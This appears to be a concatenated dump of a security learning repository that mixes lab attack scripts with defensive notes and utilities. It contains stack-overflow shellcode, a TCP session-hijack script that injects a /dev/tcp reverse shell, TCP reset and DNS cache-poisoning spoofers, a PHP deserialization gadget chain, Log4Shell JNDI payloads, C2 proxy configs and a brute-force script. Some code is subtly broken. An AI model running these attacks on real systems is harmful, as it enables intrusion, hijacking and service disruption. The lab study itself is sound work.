    """Yield `cipher` shifted back by n for n = 1..26.

    Only lowercase ASCII letters are shifted; everything else passes through.
    NOTE(review): `alphabet.index(char)-n%len(alphabet)` parses as
    index - (n % 26), which can go negative — Python's negative indexing
    then wraps it, so the result is right by accident. n = 26 reproduces
    the input unchanged, so the last candidate is always the ciphertext."""
    plain_text = ""
    for n in range(1, 27):
        plain_text = ""
        for char in cipher:
            if char in alphabet:
                plain_text += alphabet[alphabet.index(char)-n%len(alphabet)]
            else:
                plain_text += char
        yield plain_text

if __name__ == "__main__":
    # The argument placeholder after __file__ was lost when this listing was
    # extracted.
    if len(argv) < 2:
        print(f"usage: {__file__} ")
        exit(1)

    cipher = argv[1].lower()
    decoded_strings = crack_caesar(cipher)
    for string in decoded_strings:
        print(string)
--------------------------------------------------------------------------------
/Misc/BufferOverflow/exploit.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

# Writes the 300-byte payload file "exploit" used with the lab binary.
def create_exploit(return_addr):
    """Return the payload as a bytearray: 0x90 filler, the shellcode at the
    tail, and `return_addr` as a 32-bit little-endian value at bytes 112-115."""
    shellcode = (
        "\x31\xc0"
        "\x50"
        "\x68""//sh"
        "\x68""/bin/"
        "\x89\xe3"
        "\x50"
        "\x53"
        "\x89\xe1"
        "\x31\xd2"
        "\xb0\x0b"
        "\xcd\x80"
    ).encode("latin-1")

    payload = bytearray(0x90 for i in range(300))
    start = 300 - len(shellcode)
    payload[start:] = shellcode
    payload[112:116] = (return_addr).to_bytes(4, byteorder="little")
    return payload

if __name__ == "__main__":
    payload = create_exploit(0xbfff3a98)
    with open("exploit", "wb") as exploit:
        exploit.write(payload)
--------------------------------------------------------------------------------
/Misc/TCPAttacks/ResetAttack/reset_attack.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3

from scapy.all import *

def reset_attack(pkt):
    """ Sending a 
packet with the RESET bit set on behalf 7 | of the connection made between a client and a server will 8 | cause the connection to terminate. This creates a denial-of-service 9 | scenario because for connection established a client and a server 10 | will be terminated immediately after any party receives a RESET packet. 11 | """ 12 | ip = IP(src="machine_a_ip", dst="machine_b_ip") 13 | tcp = TCP(sport="server_port", dport=pkt[TCP].sport, 14 | flags="R", seq=pkt[TCP].ack) 15 | 16 | pkt = ip/tcp 17 | send(pkt, verbose=0) 18 | 19 | if __name__ == "__main__": 20 | sniff(prn=reset_attack) 21 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/pages/menu.py: -------------------------------------------------------------------------------- 1 | from gophish.models import Page 2 | from gophish.api.pages import API 3 | from colored import fg, attr 4 | from random import randint 5 | 6 | 7 | class PagesMenu: 8 | def __init__(self, client=None): 9 | self.pages_menu_color = randint(1, 220) 10 | self.client = client 11 | 12 | def prompt(self): 13 | while ( 14 | i := input( 15 | "(%sPages%s) %s " %(fg(self.pages_menu_color), attr(0), "%") 16 | ).strip().lower()): 17 | if i == "back": 18 | return 19 | else: 20 | print( 21 | "<[%s-%s]> Invalid option ..." 
22 | %(fg(self.pages_menu_color),attr(0)) 23 | ) 24 | 25 | -------------------------------------------------------------------------------- /Misc/gobust.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | #################################################### 4 | Quick script to run gobuster against files with urls 5 | using the common options I use with gobuster 6 | #################################################### 7 | 8 | URL_FILE=$1 9 | WORDLIST=$2 10 | THREADS=$3 11 | ERROR_CODES=$4 12 | 13 | for url in $(cat $URL_FILE); 14 | do 15 | 16 | echo "==> $url" 17 | 18 | if [[ -z $ERROR_CODES ]]; 19 | then 20 | ERROR_CODES=404 21 | fi 22 | 23 | if [[ -z $THREADS ]]; 24 | then 25 | THREADS=15 26 | fi 27 | 28 | IP=$(echo $url | egrep -o '([0-9]{1,3}\.){3}[0-9]{1,3}') 29 | 30 | gobuster dir -u $url -w $WORDLIST -q -k -r -t $THREADS -b $ERROR_CODES --timeout 10s --no-error --useragent "$GOOGLEBOT" | tee $IP-gobuster.stdout 31 | done 32 | -------------------------------------------------------------------------------- /NucleiTemplates/log4shell-detect.yaml: -------------------------------------------------------------------------------- 1 | id: log4shell-detect 2 | 3 | info: 4 | name: Detect Log4Shell Vulnerable Web Apps 5 | author: bin3xish477 6 | severity: high 7 | description: This scripts inject JNDI payloads into several HTTP headers and attempts to detect OOB interactions with interactsh 8 | reference: 9 | - "https://github.com/Cybereason/Logout4Shell" 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | headers: 16 | User-Agent: "${jndi:ldap://{{interactsh-url}}/x}" 17 | Server-IP: "${jndi:ldap://{{interactsh-url}}/x}" 18 | X-Forwarding: "${jndi:ldap://{{interactsh-url}}/x}" 19 | matchers: 20 | - type: word 21 | part: interactsh_protocol 22 | words: 23 | - "dns" 24 | - "http" 25 | -------------------------------------------------------------------------------- 
/WebAppSecurity/ci-cd/README.md: -------------------------------------------------------------------------------- 1 | # CI/CD 2 | 3 | ### What is a CI/CD Pipeline? 4 | 5 | ``` 6 | A continuous integration and continuous deployment (CI/CD) pipeline is a series of steps that must be performed in order to deliver a new version of software. CI/CD pipelines are a practice focused on improving software delivery throughout the software development life cycle via automation. 7 | 8 | By automating CI/CD throughout development, testing, production, and monitoring phases of the software development lifecycle, organizations are able to develop higher quality code, faster. Although it’s possible to manually execute each of the steps of a CI/CD pipeline, the true value of CI/CD pipelines is realized through automation. 9 | ``` 10 | 11 | Source: [Red Hat](https://www.redhat.com/en/topics/devops/what-cicd-pipeline) 12 | -------------------------------------------------------------------------------- /DockerStuff/C2Deployments/silent_trinity.dockerfile: -------------------------------------------------------------------------------- 1 | ############################# 2 | # build with: 3 | # docker build -t silent --build-arg TS_PASS=YourSecurePassPhrase -f ./silent_trinity.dockerfile . 
4 | # run with: 5 | # docker run --name silent -d -v /opt/st:/root/st/data -p 5000:5000 silent 6 | ############################## 7 | # connect to server from Kali with: 8 | # python3 st client wss://sername>:@:5000 9 | ############################## 10 | 11 | FROM python:3.7.11-slim-stretch 12 | ARG TS_PASS 13 | ENV TS_PASS=$TS_PASS 14 | RUN apt update && apt install -y git make gcc 15 | RUN git clone https://github.com/byt3bl33d3r/SILENTTRINITY/ /root/st/ 16 | WORKDIR /root/st/ 17 | RUN pip install -r requirements.txt 18 | EXPOSE 5000 19 | ENTRYPOINT python st.py teamserver 0.0.0.0 $TS_PASS 20 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/templates/menu.py: -------------------------------------------------------------------------------- 1 | from gophish.models import Template, Attachment 2 | from gophish.api.templates import API 3 | from colored import fg, attr 4 | from random import randint 5 | 6 | 7 | class TemplatesMenu: 8 | def __init__(self, client=None): 9 | self.templates_menu_color = randint(1, 220) 10 | self.client = client 11 | 12 | def prompt(self): 13 | while ( 14 | i := input( 15 | "(%sTemplates%s) %s " %(fg(self.templates_menu_color), attr(0), "%") 16 | ).strip().lower()): 17 | if i == "back": 18 | return 19 | else: 20 | print( 21 | "<[%s-%s]> Invalid option ..." 
22 | %(fg(self.templates_menu_color),attr(0)) 23 | ) 24 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/router.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net/http" 6 | ) 7 | 8 | type router struct{} 9 | 10 | // ServeHTTP is a receiver function that needs to be implemented 11 | // for a type that wants to be a ``http.Handler`` 12 | func (r *router) ServeHTTP(rw http.ResponseWriter, req *http.Request) { 13 | switch req.URL.Path { 14 | case "/hello": 15 | fmt.Fprintf(rw, "Hello from /hello") 16 | case "/welcome": 17 | fmt.Fprintf(rw, "welcome from /welcome") 18 | case "/bye": 19 | fmt.Fprintf(rw, "Bye from /bye") 20 | default: 21 | http.Error(rw, "Not found", 404) 22 | } 23 | } 24 | 25 | func main() { 26 | var r router 27 | // Passing in the ``http.Hanlder`` type router 28 | // as second paramter to ```http.ListenAndServer``` 29 | http.ListenAndServe("127.0.0.1:8080", &r) 30 | } 31 | -------------------------------------------------------------------------------- /C2Routing/nginx/msf_c2_rev_proxy.nginx: -------------------------------------------------------------------------------- 1 | # server instance listening on port 8080 2 | server { 3 | listen 443 http2 ssl default_server; 4 | root /var/www/html; 5 | index "index.html"; 6 | server_name "bin3x.com"; 7 | 8 | ssl_certificate "/etc/ssl/certs/nginx-selfsigned.crt"; 9 | ssl_certificate_key "/etc/ssl/private/nginx-selfsigned.key"; 10 | ssl_dhparam "/etc/ssl/certs/dhparam.pem"; 11 | 12 | # try finding the specified path in the 13 | # request URI (part after domain), if not found return 404 14 | location / { 15 | try_files $uri $uri/ =404; 16 | } 17 | 18 | # MSF C2 route 19 | location /msf_endpoint { 20 | proxy_pass "https://localhost:8443"; 21 | proxy_ssl_verify off; 22 | proxy_set_header Host $host; 23 | proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; 24 | 
} 25 | } 26 | -------------------------------------------------------------------------------- /IntegrationDeliveryDeployment/top-10-cicd-security-risks/README.md: -------------------------------------------------------------------------------- 1 | # Top 10 CI/CD Security Risks 2 | 3 | ### Insufficient Flow Control Mechanisms 4 | 5 | ### Inadequate Identity and Access Management 6 | 7 | ### Dependency Chain Abuse 8 | 9 | ### Poisoned Pipeline Execution (PPE) 10 | 11 | ### Insufficient Pipeline-Based Access Controls (PBAC) 12 | 13 | ### Insufficient Credential Hygiene 14 | 15 | ### Insecure System Configuration 16 | 17 | ### Ungoverned Usage of 3rd Party Services 18 | 19 | ### Improper Artifact Intregrity Validation 20 | 21 | ### Insufficient Logging and Visiblity 22 | 23 | #### Resources 24 | 25 | - [Cider Security CI/CD Security Risks](https://www.cidersecurity.io/top-10-cicd-security-risks/) 26 | - [OWASP DevSlop Top 10 CI/CD Security Risks YouTube Talk](https://www.youtube.com/watch?v=i1SO8AH4AxI) 27 | -------------------------------------------------------------------------------- /SecureCodeReview/go/xss/basic_xss_validation.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | // localhost:8081/?arg1= 4 | 5 | import ( 6 | "fmt" 7 | "net/http" 8 | "text/template" 9 | ) 10 | 11 | func handler(w http.ResponseWriter, r *http.Request) { 12 | arg1 := r.URL.Query().Get("arg1") 13 | 14 | tmpl, err := template.New("params").Parse( 15 | `{{ define "home" }} 16 | {{ . 
}} 17 | {{ end }}`, 18 | ) 19 | if err != nil { 20 | fmt.Printf("%s\n", err.Error()) 21 | } 22 | tmpl.ExecuteTemplate(w, "home", arg1) 23 | } 24 | 25 | func main() { 26 | http.HandleFunc("/", handler) 27 | fmt.Println("listening on :8081 ...") 28 | http.ListenAndServe(":8081", nil) 29 | } 30 | -------------------------------------------------------------------------------- /Misc/AttacksOnSUIDAndEnvVariables/CapabilityLeakingVulnerableProg.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void main() 6 | { 7 | int fd; 8 | char *v[2]; 9 | 10 | /* 11 | Assume `/etc/xyz` is an important system file, and it 12 | is owned by root with permission 0644. 13 | Before running this program, you should create the file 14 | `/etc/xyz/` first 15 | */ 16 | fd = open("/etc/xyz", O_RDWR | O_APPEND); 17 | if (fd == -1) 18 | { 19 | printf("Cannot open /etc/xyz\n"); 20 | exit(0); 21 | } 22 | 23 | printf(fd is %d\n", fd); 24 | 25 | // permanently disable the privilege by making the 26 | // effective uid the same as the real uid 27 | setuid(getuid()); 28 | 29 | // execute `/bin/bash` 30 | v[0] = "/bin/bash"; v[1] = 0; 31 | execve(v[0], v, 0); 32 | } 33 | -------------------------------------------------------------------------------- /Misc/Phishing/Pyphish/pyphish/groups/menu.py: -------------------------------------------------------------------------------- 1 | from gophish.models import Group 2 | from gophish.api.groups import API 3 | from colored import fg, attr 4 | from random import randint 5 | 6 | 7 | class GroupsMenu(): 8 | def __init__(self, client=None): 9 | self.groups_menu_color = randint(1, 220) 10 | self.client = client 11 | 12 | def prompt(self): 13 | while ( 14 | i := input( 15 | "(%sGroups%s) %s " %(fg(self.groups_menu_color), attr(0), "%") 16 | ).strip().lower()): 17 | if i == "back": 18 | return 19 | else: 20 | print( 21 | "<[%s-%s]> Invalid option ..." 
22 | %(fg(self.groups_menu_color),attr(0)) 23 | ) 24 | 25 | def get_groups(): 26 | pass 27 | -------------------------------------------------------------------------------- /Misc/PHPInsecureDeserialization/attack.php: -------------------------------------------------------------------------------- 1 | username = new ReadFile(); 8 | $this->isAdmin = True; 9 | } 10 | } 11 | 12 | class ReadFile 13 | { 14 | public function __construct() 15 | { 16 | $this->filename = "/etc/passwd"; 17 | $this->pwnobj = new Pwned(); 18 | } 19 | 20 | } 21 | 22 | class LogFile 23 | { 24 | public function __construct() 25 | { 26 | $this->filename = './proof.php'; 27 | $this->username = ''; 28 | } 29 | } 30 | 31 | class Pwned 32 | { 33 | public function __construct() 34 | { 35 | $this->command = 'echo you have been pwned > ./pwn.txt'; 36 | } 37 | } 38 | 39 | $user = new User(); 40 | echo serialize($user) . "\n"; 41 | 42 | ?> 43 | -------------------------------------------------------------------------------- /PortSwiggerAcademy/ServerSideAttacks/Authentication/account-lockout-username-enum-turbo-intruder.py: -------------------------------------------------------------------------------- 1 | def queueRequests(target, wordlists): 2 | engine = RequestEngine(endpoint=target.endpoint, 3 | concurrentConnections=1, 4 | requestsPerConnection=10, 5 | engine=Engine.BURP2 6 | ) 7 | buffer = [] 8 | chunk_size = 3 9 | for line in open('passwords.txt'): 10 | buffer.append(line.rstrip()) 11 | if len(buffer) == chunk_size: 12 | for username in open('usernames.txt'): 13 | for passwd in buffer: 14 | engine.queue(target.req, [username.rstrip(), passwd]) 15 | buffer = [] 16 | 17 | 18 | def handleResponse(req, interesting): 19 | if interesting: 20 | table.add(req) 21 | -------------------------------------------------------------------------------- /Misc/TCPAttacks/SessionHijacking/session_hijacking.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 
2 | 3 | from scapy.all import * 4 | 5 | def sess_hijack(pkt): 6 | if pkt.haslayer(TCP): 7 | newseq = pkt[TCP].seq + 10 8 | newack = pkt[TCP].ack + 1 9 | ip = IP(src="10.10.10.6", dst="10.10.10.7") 10 | tcp = TCP(sport=pkt[TCP].sport, dport=23, 11 | flags="A", seq=newseq, ack=newack) 12 | 13 | data = "\n/bin/bin -i >/dev/tcp/10.10.10.8/1337 0<&1 2>&1\n" 14 | pkt = ip/tcp/data 15 | send(pkt, verbose=0) 16 | quit() 17 | 18 | if __name__ == "__main__": 19 | print("Initiating session hijacking...") 20 | applied_filter = "tcp and src host 10.10.10.6 " \ 21 | "and dst host 10.10.10.7 " \ 22 | "and dst port 23" 23 | sniff(filter=applied_filter, prn=sess_hijack) 24 | -------------------------------------------------------------------------------- /IncidentResponse/finding_evil.md: -------------------------------------------------------------------------------- 1 | # Finding Malware On A System 2 | 3 | Attempting to identify evil on a compromised system requires a baseline understanding of what is expected and normal behavior from 4 | the system being analyzed. Periodically capturing and storing the state of a system can help aid in incident response triage by informing 5 | us of what normal looks like for the system under analysis. This process may require include gathering information such as running 6 | processes, open ports, running services, etc. 7 | 8 | ### Rogue Connections 9 | 10 | Detecting unusual connections to rogue domain or IP addresses is one way to identify malicious activities on a compromised system. 
11 | 12 | ### Unusual Processes 13 | 14 | ### Unusual Ports 15 | 16 | ### Unusual Services 17 | 18 | ### Rogue Accounts 19 | 20 | ### Unusual Files 21 | 22 | ### Autostart Locations 23 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int check_auth(char *passwd) 6 | { 7 | char passwd_buff[16]; 8 | int auth=0; 9 | 10 | strcpy(passwd_buff, passwd); 11 | if(strcmp(passwd_buff, "password!23")==0 || strcmp(passwd_buff, "123456")==0) 12 | auth=1; 13 | return auth; 14 | } 15 | 16 | int main(int argc, char *argv[]) 17 | { 18 | if(argc<2) 19 | { 20 | printf("Usage: %s ", argv[0]); 21 | exit(0); 22 | } 23 | 24 | if(check_auth(argv[1])==1) 25 | { 26 | printf("\n=-=-=-=-=-=-=-=-=-=-=-=\n"); 27 | printf("\tAccess Granted.\n"); 28 | printf("=-=-=-=-=-=-=-=-=-=-=-=\n"); 29 | } 30 | else 31 | printf("\nAccess Denied.\n"); 32 | 33 | return 0; 34 | } 35 | -------------------------------------------------------------------------------- /Misc/ArtOfExploitation/Exploitation/StackBasedBufferOverflows/auth_overflow2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int check_auth(char *passwd) 6 | { 7 | char passwd_buff[16]; 8 | int auth=0; 9 | 10 | strcpy(passwd_buff, passwd); 11 | if(strcmp(passwd_buff, "password!23")==0 || strcmp(passwd_buff, "123456")==0) 12 | auth=1; 13 | return auth; 14 | } 15 | 16 | int main(int argc, char *argv[]) 17 | { 18 | if(argc<2) 19 | { 20 | printf("Usage: %s ", argv[0]); 21 | exit(0); 22 | } 23 | 24 | if(check_auth(argv[1])==1) 25 | { 26 | printf("\n=-=-=-=-=-=-=-=-=-=-=-=\n"); 27 | printf("\tAccess Granted.\n"); 28 | printf("=-=-=-=-=-=-=-=-=-=-=-=\n"); 29 | } 30 | else 31 | printf("\nAccess Denied.\n"); 32 | 33 | return 0; 34 | } 35 | 
-------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/C2Multiplexing/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "log" 5 | "net/http" 6 | "net/http/httputil" 7 | "net/url" 8 | 9 | "github.com/gorilla/mux" 10 | ) 11 | 12 | var ( 13 | hostProxy = make(map[string]string) 14 | proxies = make(map[string]*httputil.ReverseProxy) 15 | ) 16 | 17 | func init() { 18 | hostProxy["attacker1.com"] = "http://192.168.33.128:10080" 19 | hostProxy["attacker2.com"] = "http://192.168.33.128:20080" 20 | 21 | for hostname, u := range hostProxy { 22 | remote, err := url.Parse(u) 23 | if err != nil { 24 | log.Fatal("(main) Unable to parse proxy target") 25 | } 26 | proxies[hostname] = httputil.NewSingleHostReverseProxy(remote) 27 | } 28 | } 29 | 30 | func main() { 31 | r := mux.NewRouter() 32 | for host, proxy := range proxies { 33 | r.Host(host).Handler(proxy) 34 | } 35 | log.Fatal(http.ListenAndServe(":80", r)) 36 | } -------------------------------------------------------------------------------- /Burp/Bambdas/highlightPerHttpMethod.java: -------------------------------------------------------------------------------- 1 | Annotations annotations = requestResponse.annotations(); 2 | HttpRequest request = requestResponse.request(); 3 | String method = request.method(); 4 | 5 | switch (method) { 6 | case "GET": 7 | annotations.setHighlightColor(HighlightColor.GRAY); 8 | break; 9 | case "POST": 10 | annotations.setHighlightColor(HighlightColor.ORANGE); 11 | break; 12 | case "PUT": 13 | annotations.setHighlightColor(HighlightColor.CYAN); 14 | break; 15 | case "PATCH": 16 | annotations.setHighlightColor(HighlightColor.YELLOW); 17 | break; 18 | case "DELETE": 19 | annotations.setHighlightColor(HighlightColor.RED); 20 | break; 21 | case "OPTIONS": 22 | annotations.setHighlightColor(HighlightColor.MAGENTA); 23 | break; 24 | default: 25 | 
annotations.setHighlightColor(HighlightColor.PINK); 26 | break; 27 | } 28 | 29 | return true; 30 | -------------------------------------------------------------------------------- /DockerStuff/BugBounty/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM golang:latest 2 | 3 | RUN apt update && apt upgrade -y && \ 4 | apt install wget tar -y 5 | 6 | RUN go get -v -u github.com/tomnomnom/fff 7 | RUN go get -v -u github.com/tomnomnom/assetfinder 8 | RUN go get -v -u github.com/tomnomnom/gron 9 | RUN go get -v -u github.com/tomnomnom/gf 10 | RUN go get -v -u github.com/tomnomnom/httprobe 11 | RUN go get -v -u github.com/tomnomnom/unfurl 12 | RUN go get -v -u github.com/tomnomnom/anew 13 | RUN go get -v -u github.com/tomnomnom/waybackurls 14 | RUN go get -v -u github.com/OWASP/Amass/v3/... 15 | RUN go get -v -u github.com/ffuf/ffuf 16 | 17 | WORKDIR /tools 18 | RUN wget https://github.com/epi052/feroxbuster/releases/download/v2.3.2/x86_64-linux-feroxbuster.tar.gz && \ 19 | tar xzvf x86_64-linux-feroxbuster.tar.gz && chmod +x feroxbuster && \ 20 | install feroxbuster /usr/local/bin/feroxbuster && rm ./x86_64-linux-feroxbuster.tar.gz 21 | -------------------------------------------------------------------------------- /OffensiveGo/HTTPServers/middleware.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "log" 6 | "net/http" 7 | ) 8 | 9 | type Logger struct { 10 | Inner http.Handler 11 | } 12 | 13 | // ServerHTTP is a wrapper to the Logger.Inner ``http.Handle`` 14 | func (l *Logger) ServeHTTP(w http.ResponseWriter, r *http.Request) { 15 | log.Println("Starting ...") 16 | l.Inner.ServeHTTP(w, r) 17 | log.Println("Ending ...") 18 | } 19 | 20 | // welcome is a callback functions for any request made 21 | // to our server 22 | func welcome(w http.ResponseWriter, r *http.Request) { 23 | fmt.Fprintf(w, "Welcome!\n") 24 | } 25 | 26 | func main() { 27 
| // Handler function is return an ``http.Handler`` 28 | f := http.HandlerFunc(welcome) 29 | // Instantiating a new Logger instance and assigning 30 | // the Inner variable to be f 31 | l := Logger{Inner: f} 32 | // Starting server 33 | http.ListenAndServe("127.0.0.1:8080", &l) 34 | } 35 | -------------------------------------------------------------------------------- /Misc/DNSAttacks/local_dns_cache_poisoning.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | 3 | # flush DNS cache: ipconfig /flushdns 4 | 5 | def poison_cache(pkt): 6 | """Spoof DNS request to `example.com` and poison local DNS cache""" 7 | if (DNS in pkt and 'example.com' in pkt[DNS].qd.qname.decode('utf-8')): 8 | print("Spoofing DNS reply for DNS query for `example.com`") 9 | ip = IP(src=pkt[IP].dst, dst=pkt[IP].src) 10 | udp = UDP(sport=53, dport=pkt[UDP].sport) 11 | 12 | Annsec = DNSRR( 13 | rrname=pkt[DNS].qd.qname, type='A', 14 | rdata='1.2.3.4', ttl=259200 15 | ) 16 | dns = DNS( 17 | id=pkt[DNS].id, qd=pkt[DNS].qd, aa=1, 18 | qr=1, qdcount=1, ancount=1, an=Annsec 19 | ) 20 | 21 | spoofpkt = ip/udp/dns 22 | send(spoofpkt, verbose=0) 23 | 24 | if __name__ == "__main__": 25 | sniff(filter="udp", prn=poison_cache) -------------------------------------------------------------------------------- /Burp/Bambdas/highlightPerHttpMethod.json: -------------------------------------------------------------------------------- 1 | { 2 | "bambda":{ 3 | "http_history_display_filter":{ 4 | "bambda":"Annotations annotations = requestResponse.annotations();\r\nHttpRequest request = requestResponse.request();\r\nString method = request.method();\r\n\r\nswitch (method) {\r\n case \"GET\":\r\n annotations.setHighlightColor(HighlightColor.GRAY);\r\n break;\r\n case \"POST\":\r\n annotations.setHighlightColor(HighlightColor.ORANGE);\r\n break;\r\n case \"PUT\":\r\n annotations.setHighlightColor(HighlightColor.CYAN);\r\n break;\r\n case \"PATCH\":\r\n 
annotations.setHighlightColor(HighlightColor.YELLOW);\r\n break;\r\n case \"DELETE\":\r\n annotations.setHighlightColor(HighlightColor.RED);\r\n break;\r\n case \"OPTIONS\":\r\n annotations.setHighlightColor(HighlightColor.MAGENTA);\r\n break;\r\n default:\r\n break;\r\n}\r\n\r\nreturn true;\r\n" 5 | } 6 | } 7 | } 8 | -------------------------------------------------------------------------------- /Cryptography/Hashing/generate_wordlist.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from sys import argv, exit 3 | 4 | def generate_wordlist(alphabet, max_length): 5 | # base case 6 | if max_length <= 0: return 7 | for c in alphabet: yield c 8 | for c in alphabet: 9 | print(max_length) 10 | # recursion :( 11 | for n in generate_wordlist(alphabet, max_length-1): 12 | print("yield") 13 | yield c + n 14 | 15 | if __name__ == "__main__": 16 | if len(argv) != 3: 17 | print(f"Usage: {__file__} ") 18 | exit(1) 19 | 20 | wordlist_alphabet = argv[1] 21 | wordlist_max_length = int(argv[2]) 22 | wordlist = generate_wordlist(wordlist_alphabet, wordlist_max_length) 23 | [print(word) for word in wordlist] 24 | 25 | with open("word.lst", "w") as f: 26 | [f.write(word+"\n") for word in wordlist] 27 | 28 | -------------------------------------------------------------------------------- /Defense/Canaries/FileCanaries/README.md: -------------------------------------------------------------------------------- 1 | # File Canary 2 | 3 | Receive an email whenever a file you intentionally create to lure attackers gets opened. This should be installed as a cronjob (Linux) or scheduled task (Windows). Enjoy! 
4 | 5 | ### Usage 6 | 7 | Set the following environment variables: 8 | 9 | - `EMAIL_ADDR` - gmail address 10 | - `EMAIL_PASS` - gmail password (if you are using 2fa authentication, you need to create an app password to authenticate to gmail 11 | 12 | Getting an app password: [app_password](https://www.lifewire.com/get-a-password-to-access-gmail-by-pop-imap-2-1171882) 13 | 14 | ``` 15 | usage: canary.py [-h] FILE 16 | 17 | Basic file canary Python program 18 | 19 | positional arguments: 20 | FILE File to act as canary 21 | 22 | optional arguments: 23 | -h, --help show this help message and exit 24 | ``` 25 | 26 | ### Example 27 | 28 | ``` 29 | python3 canary.py secrets.txt 30 | ``` 31 | -------------------------------------------------------------------------------- /Burp/CustomActions/QueryParamXSSInjection.java: -------------------------------------------------------------------------------- 1 | List modifiedParams = new ArrayList<>(); 2 | requestResponse.request().parameters().forEach((param) -> { 3 | if (param.type() == HttpParameterType.URL) { 4 | logging.logToOutput(String.format("[+] injectiong XSS payload in parameter named: '%s'", param.name())); 5 | HttpParameter p = HttpParameter.urlParameter(param.name(), ""); 6 | modifiedParams.add(p); 7 | } else { 8 | modifiedParams.add(param); 9 | } 10 | }); 11 | 12 | var response = api().http().sendRequest(requestResponse.request().withUpdatedParameters(modifiedParams)).response(); 13 | var body = response.body().toString(); 14 | if (body.contains("onerror=\"alert(") 15 | || body.contains("onerror=alert(")) { 16 | logging.logToOutput("[+] the submitted XSS payload () has been reflected in the response body!"); 17 | } 18 | -------------------------------------------------------------------------------- /Misc/BashCyOps/IncidentResponse/commands_ran_with_sudo.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | #IFS=$"\n" 4 | if [[ $EUID != "0" ]] 5 | then 
6 | echo "[-] Must run $0 as root..." 7 | exit 1 8 | fi 9 | 10 | printf "%15s\n" "Date" 11 | printf "========================================================================================\n" 12 | 13 | while read LINE 14 | do 15 | [[ -z $LINE ]] && continue 16 | if [[ "$LINE" == *"COMMAND"* ]] && [[ "$LINE" == *"PWD"* ]] 17 | then 18 | DATE=$(echo $LINE | egrep -o '[JFMASONDa-z]{3}\s[0-9]{1,2}\s[0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}') 19 | USERNAME=$(echo $LINE | egrep -o 'USER=[A-Za-z0-9]+\s') 20 | # Change the statements above to use parameter expansion for optimization 21 | DIRECTORY=${LINE##*PWD=} && DIRECTORY=${DIRECTORY/ *//} 22 | echo $DATE $USERNAME $DIRECTORY 23 | else 24 | continue 25 | fi 26 | done < /var/log/auth.log 27 | 28 | -------------------------------------------------------------------------------- /OffensiveGo/PortScanner/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net" 6 | "sort" 7 | ) 8 | 9 | func worker(ports, results chan int) { 10 | for p := range ports { 11 | addr := fmt.Sprintf("scanme.nmap.org:%d", p) 12 | conn, err := net.Dial("tcp", addr) 13 | if err != nil { 14 | continue 15 | } 16 | conn.Close() 17 | results <- p 18 | } 19 | } 20 | 21 | func main() { 22 | ports, results := make(chan int, 100), make(chan int) 23 | var openPorts []int 24 | 25 | for i := 0; i < cap(ports); i++ { 26 | go worker(ports, results) 27 | } 28 | 29 | go func() { 30 | for i := 1; i <= 1024; i++ { 31 | ports <- i 32 | } 33 | }() 34 | 35 | for range results { 36 | port := <-results 37 | openPorts = append(openPorts, port) 38 | } 39 | 40 | close(ports) 41 | close(results) 42 | 43 | sort.Ints(openPorts) 44 | for _, port := range openPorts { 45 | fmt.Printf("%d [open]\n", port) 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /SecureCodeReview/secure-code-practices/README.md: 
-------------------------------------------------------------------------------- 1 | # Secure Coding Best Practices 2 | 3 | - [ ] Input Validation 4 | - sanitize, validate all user-supplied input server-side 5 | - centralize input validation procedures 6 | - conanicalize data before passing it to a validation routine 7 | - data that fails to pass validations should be rejected 8 | - validate all sources of untrusted user inputs such as URLs, URL parameters, HTTP headers, form data 9 | - validate number ranges, date ranges, expected data types 10 | - validate input against trusted allow ("white") list 11 | - [ ] Output Encoding 12 | - [ ] Authentication and Password Management 13 | - [ ] Session Management 14 | - [ ] Access Control 15 | - [ ] Cryptographic Practices 16 | - [ ] Error Handling and Logging 17 | - [ ] Data Protection 18 | - [ ] Communication Security 19 | - [ ] System Configuration 20 | - [ ] Database Security 21 | - [ ] File Management 22 | - [ ] Memory Management 23 | -------------------------------------------------------------------------------- /Defense/Zeek/Learning/check_if_ip_local_or_external.zeek: -------------------------------------------------------------------------------- 1 | global local_subnets: set[subnet] = {192.168.1.0/24, 192.68.2.0/24, 172.16.0.0/20, 172.16.16.0/20, 172.16.32.0/20, 172.16.48.0/20}; 2 | global inside_local_network: set[addr]; 3 | global outside_local_network: set[addr]; 4 | 5 | event new_connection(c: connection) 6 | { 7 | if (c$id$orig_h in local_subnets) 8 | { 9 | add inside_local_network[c$id$orig_h]; 10 | } 11 | else 12 | add outside_local_network[c$id$orig_h]; 13 | 14 | if (c$id$resp_h in local_subnets) 15 | { 16 | add inside_local_network[c$id$resp_h]; 17 | } 18 | else 19 | add outside_local_network[c$id$resp_h]; 20 | } 21 | 22 | event zeek_done() 23 | { 24 | print("IP's inside local network"); 25 | for (local_ip in inside_local_network) 26 | { 27 | print(local_ip); 28 | } 29 | print("IP's outside local 
